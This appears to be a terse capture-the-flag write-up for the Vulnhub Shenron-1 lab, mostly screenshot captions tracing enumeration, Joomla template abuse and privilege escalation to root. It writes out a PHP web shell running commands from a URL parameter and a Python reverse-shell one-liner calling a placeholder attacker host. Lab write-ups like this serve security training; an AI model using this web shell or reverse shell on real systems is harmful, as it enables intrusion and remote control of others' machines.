Vulnhub Shenron-1 write-up

Open Ports
Service version detection
dirb output showing Joomla running on port 80
gobuster output
test directory showing password file.
password page.
Credentials in page-source
Extension — Templates — Templates
Creating a PHP file
New PHP file my_shell.php

<?php echo "This will execute command."; ?>
<?php echo shell_exec($_GET['cmd']); ?>

PHP code to get RCE
my_shell.php in action
Able to execute command.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",attacker-port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Reverse shell on shenron
jenny username and password
login with jenny user
ssh as user jenny
sudo -l output
SSH as user shenron
local.txt
LinPEAS.sh to help
shenron password
sudo -l for user shenron
GTFOBins apt privilege escalation
root on shenron-1
